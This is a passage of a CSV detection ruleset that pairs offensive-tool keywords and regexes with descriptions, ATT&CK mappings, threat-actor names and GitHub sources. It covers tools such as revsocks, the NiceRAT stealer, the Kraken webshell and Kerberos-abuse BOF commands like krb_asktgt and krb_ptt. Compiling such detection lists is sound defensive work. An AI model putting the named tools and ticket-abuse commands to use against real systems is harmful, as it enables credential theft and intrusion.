"*kost/revsocks*",".{0,1000}kost\/revsocks.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","50551"
"*kpcyrd/badtouch*",".{0,1000}badtouch.{0,1000}","offensive_tool_keyword","badtouch","Scriptable network authentication cracker","T1110 - T1210.001 - T1558.003","TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/kpcyrd/badtouch","1","0","N/A","N/A","N/A","5","410","45","2023-12-19T14:50:40Z","2018-03-15T22:27:56Z","50552"
"*kpfopkelmapcoipemfendmdcghnegimn*",".{0,1000}kpfopkelmapcoipemfendmdcghnegimn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50553"
"*KPortScan.exe*",".{0,1000}KPortScan\.exe.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","50555"
"*KPortScan.rar*",".{0,1000}KPortScan\.rar.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","50556"
"*KPortScan.zip*",".{0,1000}KPortScan\.zip.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","50557"
"*KPortScan3.exe*",".{0,1000}KPortScan3\.exe.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","1","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","50558"
"*kr.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}kr\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","50559"
"*krackattacks*",".{0,1000}krackattacks.{0,1000}","offensive_tool_keyword","krackattacks-scripts","This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper.","T1170 - T1555.003 - T1583.002","TA0003 - TA0007 - TA0010","N/A","N/A","Reconnaissance","https://github.com/vanhoefm/krackattacks-scripts","1","0","N/A","N/A","N/A","10","3396","768","2024-12-25T20:42:57Z","2017-10-18T12:58:08Z","50560"
"*Kraken Mask by @DallasFR*",".{0,1000}Kraken\sMask\sby\s\@DallasFR.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","N/A","9","","N/A","","","","50561"
"*kraken.py --connect --mode * --profile * --compiler *",".{0,1000}kraken\.py\s\-\-connect\s\-\-mode\s.{0,1000}\s\-\-profile\s.{0,1000}\s\-\-compiler\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50562"
"*Kraken-1.2.0.zip*",".{0,1000}Kraken\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","1","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","50563"
"*KrakenMask-main*",".{0,1000}KrakenMask\-main.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","N/A","9","","N/A","","","","50564"
"*kraken-ng/Kraken*",".{0,1000}kraken\-ng\/Kraken.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","1","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","50565"
"*krb_asktgs /*",".{0,1000}krb_asktgs\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50566"
"*krb_asktgt /*",".{0,1000}krb_asktgt\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50567"
"*krb_asreproasting*",".{0,1000}krb_asreproasting.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50568"
"*krb_changepw /*",".{0,1000}krb_changepw\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50569"
"*KRB_CRED kirbi *",".{0,1000}KRB_CRED\skirbi\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50570"
"*KRB_CRED(kirbiBytes)*",".{0,1000}KRB_CRED\(kirbiBytes\).{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50571"
"*krb_cross_s4u /*",".{0,1000}krb_cross_s4u\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50572"
"*krb_describe /*",".{0,1000}krb_describe\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50573"
"*krb_dump /*",".{0,1000}krb_dump\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50574"
"*krb_hash /password*",".{0,1000}krb_hash\s\/password.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50575"
"*krb_klist /*",".{0,1000}krb_klist\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50576"
"*krb_ptt /ticket:*",".{0,1000}krb_ptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50577"
"*krb_purge /*",".{0,1000}krb_purge\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50578"
"*krb_renew /ticket:*",".{0,1000}krb_renew\s\/ticket\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 